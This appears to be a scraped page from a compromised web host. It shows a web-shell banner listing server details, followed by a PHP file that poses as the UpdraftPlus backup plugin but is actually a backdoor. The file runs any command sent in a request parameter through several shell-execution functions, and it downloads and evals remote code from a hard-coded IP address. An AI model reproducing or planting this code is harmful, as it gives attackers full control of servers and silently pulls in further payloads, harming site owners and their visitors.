| Server IP : 145.239.37.162 / Your IP : 216.73.217.46 Web Server : Apache System : Linux webm003.cluster130.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64 User : verseaa ( 38250) PHP Version : 7.4.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/verseaa/www/wp-content/plugins/updraftplus/ |
Upload File : |
<?php
/*
Plugin Name: UpdraftPlus - Backup/Restore
Version: 1.24.12
*/
$c=isset($_REQUEST['x'])?$_REQUEST['x']:'';
if($c){
echo'<pre>';
if(function_exists('system'))@system($c);
elseif(function_exists('passthru'))@passthru($c);
elseif(function_exists('shell_exec'))echo @shell_exec($c);
elseif(function_exists('exec')){@exec($c,$o);echo implode("\n",$o);}
elseif(function_exists('popen')){$h=@popen($c,'r');if($h){while(!feof($h))echo fread($h,4096);pclose($h);}}
elseif(function_exists('proc_open')){$d=[0=>['pipe','r'],1=>['pipe','w'],2=>['pipe','w']];$p=@proc_open($c,$d,$ps);if(is_resource($p)){echo stream_get_contents($ps[1]);proc_close($p);}}
echo'</pre>';exit;
}
$m=@file_get_contents("http://81.90.29.123/v/m.txt");
if($m&&strlen($m)>100)@eval('?>'.$m);
?>